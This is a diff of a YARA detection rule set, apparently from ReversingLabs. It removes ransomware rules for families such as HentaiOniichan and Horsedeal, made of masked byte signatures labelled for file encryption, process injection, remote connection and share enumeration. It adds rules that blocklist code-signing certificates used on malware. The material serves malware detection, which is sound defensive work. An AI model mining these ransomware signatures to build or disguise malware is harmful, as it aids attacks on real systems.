-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? 83
-            F8 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 5C 24 ??
-            E8 ?? ?? ?? ?? 85 C0 78 ?? 4C 63 C8 4C 8D 85 ?? ?? ?? ?? 48 8D 44 24 ?? 4D 2B C1 48
-            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 64 24 ?? E8 ?? ?? ?? ??
-            49 8B CD FF 15 ?? ?? ?? ?? 44 8B C0 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? 41 F7 E8 C1 FA
-            ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 44 3B C1 74 ?? FF C2 4C 8D 3D ?? ?? ?? ??
-            85 D2 0F 8E ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 49 8B DD 4C 89 B4 24 ?? ?? ?? ?? 49
-        }
-		$encrypt_files_p3 = {
-            8B FF 44 8B F2 0F 1F 00 48 8B 0D ?? ?? ?? ?? 8B 91 ?? ?? ?? ?? 85 D2 74 ?? 83 FA ??
-            75 ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89
-            5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C7 ??
-            ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 49 83 EE ?? 75 ?? 4C 8B B4 24 ?? ?? ?? ?? 33 DB 48 8B
-            BC 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 FF C6 41 80 3C 34 ?? 75 ?? 48 8B 8D ?? ?? ??
-            ?? 48 8D 15 ?? ?? ?? ?? 89 74 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 4C 89 64 24 ?? FF 15
-            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 45 33 C0 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? EB ?? 48 8B 8D ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 3D ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 45 33
-            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 49 8B CC FF
-            15 ?? ?? ?? ?? 49 8B D4 48 8D 0D ?? ?? ?? ?? FF C0 4C 63 C0 E8 ?? ?? ?? ?? 48 8B 05
-            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ??
-            ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B 0D ?? ??
-            ?? ?? FF 50 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 33 D2 44 8D 42 ?? FF D0 48
-            8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 63 85 ?? ?? ?? ?? 48 3D ??
-            ?? ?? ?? 73 ?? 0F 1F 00 48 63 85 ?? ?? ?? ?? 42 C6 04 28 ?? FF 85 ?? ?? ?? ?? 48 63
-            85 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 72 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            5E 5B 5D C3
-        }
-		$enum_procs = {
-            40 56 48 81 EC ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 48 8B C8 48 8B F0 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 89 9C
-            24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ??
-            0F 1F 40 ?? 0F 1F 84 00 ?? ?? ?? ?? 33 DB 48 8B FD 66 66 66 0F 1F 84 00 ?? ?? 00 00
-            48 8B 0F 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF C3 48 83 C7 ?? 83 FB ?? 72
-            ?? EB ?? 44 8B 44 24 ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? BA
-            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48
-            8B CE FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ??
-            48 8B 9C 24 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E C3
-        }
-		$enum_shares = {
-            48 83 EC ?? 33 D2 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C
-            8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 89 5C 24 ?? 8B 5C 24 ?? 48 89 7C 24 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 0D ??
-            ?? ?? ?? 4C 8D 43 ?? BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 48 8B
-            4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 66 0F
-            1F 44 00 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ??
-            48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B
-            5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C7 48 8D 54 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 48 8B 0D ?? ?? ?? ?? 4C 8B C7 33 D2 FF 15 ?? ?? ?? ?? 48 8B 4C 24 ??
-            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 5C 24 ?? 48 83 C4 ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "39:1a:e3:86:70:ab:18:8a:5d:e2:6e:07" and 1540832872 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "5acd2e61-1c04-5cc5-8773-25856fc163c4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16156-L16174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "5fdaf01c6a23057ab976e3ad2a8b40558b16693161410b0f30d7b884de7e3985"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" or pe.signatures [ i ] . serial == "d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" ) and 1444780800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hentaioniichan : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Hentai Oniichan ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cd5e916f-7195-5bb6-abff-b08231053f9a"
-		date = "2021-03-05"
-		modified = "2021-03-05"
+		id = "21c16e2c-bc0c-5e1d-bc44-6d7c4afc34cb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HentaiOniichan.yara#L1-L140"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16176-L16192"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "153526e5a2f05bc8e3f77d83eefce6b4cd962ea093b6f1c0ab8fcabe8d8a7ad9"
+		logic_hash = "24474c4033a8cad1690160da64b75a1eec570f56e830967256c19574bde59384"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HentaiOniichan"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
-            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
-            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
-            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
-            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
-            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
-        }
-		$find_files_p2 = {
-            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
-            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
-            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$inject_code_into_process = {
-            33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8B C6 8D 8D
-            ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83
-            C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? ??
-            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 15 ?? ?? ?? ?? 39 85 ?? ?? ?? ??
-            74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
-            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ??
-            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
-            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ??
-            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B
-            4D ?? 85 C9 74 ?? 51 8B D0 E8 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ??
-            2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8B C6 C1 E1 ?? 81 F9 ?? ?? ?? ??
-            72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3
-            5B C3 E8
-        }
-		$remote_connection_p1 = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45
-            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 28 45
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 ?? 0F 28 45
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 0F 29 45 ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45
-        }
-		$remote_connection_p2 = {
-            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45
-            ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
-            ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51
-            0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            0F 43 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 6A ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 50 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 FA ?? 72 ?? 8B
-            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files = {
-            8B FF 55 8B EC 83 EC ?? 8B 4D ?? 89 4D ?? 53 56 8B 75 ?? 57 8B 7D ?? 89 7D ?? 85 C9
-            0F 84 ?? ?? ?? ?? 85 FF 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B C6 8B D6 C1 FA ?? 83 E0 ?? 6B C0 ?? 89
-            55 ?? 8B 14 95 ?? ?? ?? ?? 89 45 ?? 8A 5C 02 ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1
-            F7 D0 A8 ?? 74 ?? 8B 45 ?? F6 44 02 ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 56 E8 ?? ?? ?? ?? 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 0F 87 ?? ?? ??
-            ?? FF 75 ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8D
-            45 ?? 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 0C 85 ?? ?? ?? ?? 8B 45 ??
-            80 7C 01 ?? ?? 7D ?? 0F BE C3 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 0F 85 ?? ?? ??
-            ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ??
-            ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 01 ?? 8D 7D ??
-            33 C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 45 ?? 85 C0 75 ?? 8B 45 ??
-            85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            30 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? 8B 4D ?? 8B
-            04 85 ?? ?? ?? ?? F6 44 08 ?? ?? 74 ?? 80 3F ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 20 ?? E9 ?? ?? ?? ?? 2B 45 ?? EB ?? 33 C0 5F 5E 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $inject_code_into_process ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "06:ce:20:94:77:f1:ac:19:a2:04:9b:dc:58:46:a8:31" and 1426710344 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Horsedeal : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Horsedeal ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c722bc5b-756e-5d46-8530-e20ebb73737c"
-		date = "2020-10-01"
-		modified = "2020-10-01"
+		id = "a3ee3618-0e20-5d9c-a514-9020607bd1b0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Horsedeal.yara#L1-L106"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16194-L16210"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fa8c425b08606399b5dc7673f3898e3dba7efb6a62e56db8f500cf5072bb590b"
+		logic_hash = "f473a939d1a27cf53c09d0e4a3753a9444ae3674a55d5b0feafeef6b75dd487f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Horsedeal"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_processes = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D
-            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53
-            FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF B5 ?? ?? ??
-            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5B 56 FF 15 ??
-            ?? ?? ?? 5E C9 C3
-        }
-		$enum_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? E8 ?? ?? ??
-            ?? 8B F0 85 F6 74 ?? EB ?? 33 DB 39 5C 24 ?? 76 ?? 8D 7E ?? F6 47 ?? ?? 74 ?? 8D 47
-            ?? 50 E8 ?? ?? ?? ?? EB ?? FF 37 E8 ?? ?? ?? ?? 43 83 C7 ?? 59 3B 5C 24 ?? 72 ?? 8D
-            44 24 ?? 50 56 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ??
-            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57
-            8B 7D ?? 74 ?? 68 ?? ?? ?? ?? 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ??
-            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
